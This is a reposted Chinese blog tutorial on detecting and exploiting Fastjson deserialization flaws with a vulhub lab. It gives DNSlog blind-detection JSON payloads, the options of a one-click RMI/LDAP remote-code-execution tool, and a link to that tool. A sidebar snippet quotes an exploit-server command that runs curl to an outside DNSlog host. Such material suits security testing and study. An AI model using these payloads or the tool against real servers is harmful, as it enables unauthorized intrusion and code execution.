Fastjson批量检查及一键利用工具

已于 2022-08-30 09:21:26 修改
阅读量3.7k 收藏 7
点赞数
分类专栏: 工具的使用 文章标签: web安全
于 2021-10-30 19:38:48 首次发布
原文链接:https://www.freebuf.com/news/244113.html
版权

0x01 序章

上次讲解过手动利用fastjson,但讲的过于太简单了。根据大家的反应,收集如下几个问题。

1、如何盲打fastjson

2、判断fastjson的指纹

3、各版本payload以及使用ldap模式监听。

下面我就一一解答,我只是把我在网上查到的资料消化 后分享给大家,如果有大佬觉得哪里不对,还望不吝赐教。这次还带来了一键利用及检测工具,链接在文末。

注:本文仅用于技术讨论与研究,严禁用于任何违法用途,违者后果自负

0x02 环境搭建

这个不用多说了吧,使用vulhub搭建。

启动fastjson:1.2.24或者fastjson:1.2.45都可以。

判断fastjson:

无特殊配置情况下fastjson,无正确的闭合会报错,返回结果里有fastjson字样。

1595340535.png!small

从上图可以看出,我们使用了一个花括号,fastjson处理json时会返回报错信息。

有的小伙伴就问了,如果是配置了不返回报错信息怎么办?那这种情况就只有利用dnslog盲打了。

1595340536.png!small1595340537.png!small

这里有个小技巧就是,如果你批量检查或者自己的dnslog,里面有很多记录。你可以这样使用'baidu'.d1flzs.dnslog.cn,在dnslog前面加个名称

盲打payload:

1.2.67版本前

{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}

1.2.67版本后payload

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

0x03 工具使用

下面讲解工具使用,这是通过GitHub上大佬工具改造的。

支持rmi及ldap两种模式

参数介绍:

  -h, --help               //查看帮助

  -u, --url                  //漏洞url

  -c, --commamd     //执行命令

  -m, --mode           //选择执行模式(可选),1:ldap模式(默认);2:rmi模式

演示效果(dnslog):

1595340631.png!small

1595340538.png!small

演示效果(创建文件):

1595340539.png!small1595340540.png!small

0x04 批量检测

1595340540.png!small

工具链接:

https://github.com/mrknow001/fastjson_rec_exploit

zxl2605
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
探索快速且精准的Fastjson漏洞检测工具FastjsonScan
gitblog_00045的博客
05-16 506
探索快速且精准的Fastjson漏洞检测工具FastjsonScan 项目地址:https://gitcode.com/a1phaboy/FastjsonScan 在今天这个高度数字化的时代,数据的安全性至关重要。作为Java世界中广泛使用的JSON解析库,Fastjson因其高效性能深受开发者喜爱。然而,随之而来的是频繁出现的安全隐患。为此,我们向您推荐一款强大且持续更新的漏洞探测工具——Fa...
探索Fastjson漏洞利用工具Fastjson_rec_exploit
最新发布
gitblog_00042的博客
04-19 481
探索Fastjson漏洞利用工具Fastjson_rec_exploit 项目地址:https://gitcode.com/mrknow001/fastjson_rec_exploit 在软件开发中,安全是至关重要的一环。尤其是当我们处理JSON数据时,一个小小的疏忽可能导致严重的安全问题。Fastjson是一款由阿里巴巴开发的高性能Java JSON库,但过去曾出现过一些安全漏洞。为了解决这些...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
一起来看看Fastjson的三种漏洞利用
程序猿DD
08-24 1742
作者 |4ra1n来源 |https://www.anquanke.com/post/id/248892Fastjson已被大家分析过很多次,本文主要是对三种利用链做分析和对比Jdbc...
Fastjson扫描测试工具.rar
09-08
在渗透测试中遇到json数据一般都会测试下有没有反序列化,然而JSON库有Fastjson,JackJson,Gson等等,那么怎么判断后端不是Fastjson呢?可以构造特定的payload来进行探测分析
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan 一个简单的Fastjson反序列化检测burp插件 我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说burp搭配其他扫描器了,就连找到特定目录下的脚本我都觉得麻烦,所以,我决定一劳永逸地解决这个问题,于是去学习了一下burp插件的写法糊弄出了这个插件 安装方法 下载项目中的FastjsonScan.jar文件 在burp的Extender->Extensions栏,点击Add,选择下载好的jar文件就可以了(执行环境是Java) 如果成功安装,会输出如下信息,如果未能成功安装可以换下jdk版本??我用的1.8 使用方法 使用方法也很简单,就像使用repeater一样,你可以在burp的任何地方选中一个请求右键选择【Send to FastjsonScan
FastJson工具
真香号
11-29 442
一、 首先需要了解什么是Json? JSON(JavaScript Object Notation, JS 对象简谱)是一种轻量级的数据交换格式。它基于ECMAScript(欧洲计算机协会制定的JS规范)的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。简洁和清晰的结构层次使得JSON成为理想数据交换语言。易于人编写和阅读,同时也已于机器解析和生成,有效的提升了网络传输的效率。...
jndi-tool JNDI服务利用工具
01-06
总结来说,"jndi-tool"是一个强大的JNDI服务利用工具,适用于评估和利用Fastjson和Log4j漏洞相关的RCE风险。它利用RMI和LDAP协议,可以在高版本JDK环境下运行,为安全专业人士提供了一种有效测试环境安全性的手段...
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
fastjson工具
06-19
FastJson对于json格式字符串的解析主要用到了下面三...1.JSON:fastJson的解析器,用于JSON格式字符串与JSON对象及javaBean之间的转换 2.JSONObject:fastJson提供的json对象 3.JSONArray:fastJson提供json数组对象
fastjson反序列化利用
09-29
如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。...
渗透测试-Fastjson各版本漏洞分析(下)
cdyunaq的博客
04-18 4091
- fastjson 1.2.45 - 1.2.44中对[进行了判断,我们用1.2.43的POC,然后下个JSONException的异常断点,看看是怎么判断的 运行后,在com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class, int)成功拦截 分析一下,发现如果开头是[就直接抛出异常 那再看看1.2.41里面的绕法呢,前面加个L,后面加个;,发现会检查结尾是否为;,是的话
阿里巴巴Json工具Fastjson简单使用
Mr_chen的博客
12-09 706
阿里巴巴Json工具Fastjson简单使用 前言 开始之前首先我们要了解JSON是什么? JSON(JavaScript Object Notation,JS对象简谱)是一种轻量级的数据交换格式。它基于ECMAScript(欧洲计算机协会制定的js规范)的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。易于人阅读和编写,...
一款检测Fastjson反序列化的burp插件
一个安全研究员
09-01 6751
用了都说好
FastJSON工具类测试
huangxw000的专栏
03-16 1078
FastJSON是一个很好的java开源json工具类库,相比其他同类的json类库,它的速度的确是fast,最快!但是文档做得不好,在应用前不得不亲测一些功能。   实际上其他的json处理工具都和它差不多,api也有几分相似。   一、JSON规范 JSON是一个标准规范,用于数据交互,规范的中文文档如下: http://www.json.org/json-zh.html
Fastjson 阿里巴巴Json工具使用方式
qq1140037586的博客
04-03 441
欢迎使用Markdown编辑器 FastJson下载地址 前言 JSON是什么? 1.json并不难理解,简单点理解就是一种数据交换的格式 2.json只有两中结构,一种是object另一种是array,并且两者可以相互嵌套,{}是对象,[]是数组 JSON(JavaScript Object Notation,JS对象简谱)是一种轻量级的数据交换格式。它基于ECMAScript(欧洲计算机协会制...
阿里巴巴Json工具-Fastjson教程
码农小胖哥
11-20 1193
首先我们要了解JSON是什么?JSON(JavaScriptObject Notation, JS 对象简谱) 是一种轻量级的数据交换格式。它基于ECMAScript...
fastjson漏洞利用
09-07
对于Fastjson漏洞利用,可以通过利用Fastjson的反序列化漏洞来实施攻击。这些漏洞可能导致远程代码执行或者JNDI注入的风险。具体来说,攻击者可以构造一个恶意的JSON字符串,其中包含一个特殊的类或对象,以触发Fastjson在反序列化时执行恶意的代码。这样的攻击可以导致服务器受到攻击者完全控制的风险。 为了防止Fastjson漏洞的利用,可以采取以下措施: 1. 及时更新Fastjson库至最新版本,因为Fastjson团队通常会修复已知的安全漏洞。 2. 配置Fastjson的autotype机制,限制只反序列化预定义的安全类。这样可以减少恶意类的反序列化风险。 3. 限制Fastjson的使用范围,仅在可信赖的环境中使用。不要从不受信任的来源接收、解析和反序列化JSON数据。 4. 使用安全的编码和输入验证,确保JSON数据的完整性和真实性。 需要注意的是,漏洞利用是一种恶意行为,违法的使用是不被允许的。这里提供的信息仅供技术参考和学习目的。使用Fastjson的开发人员应该保持警惕,及时更新并采取适当的安全措施来保护系统的安全。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值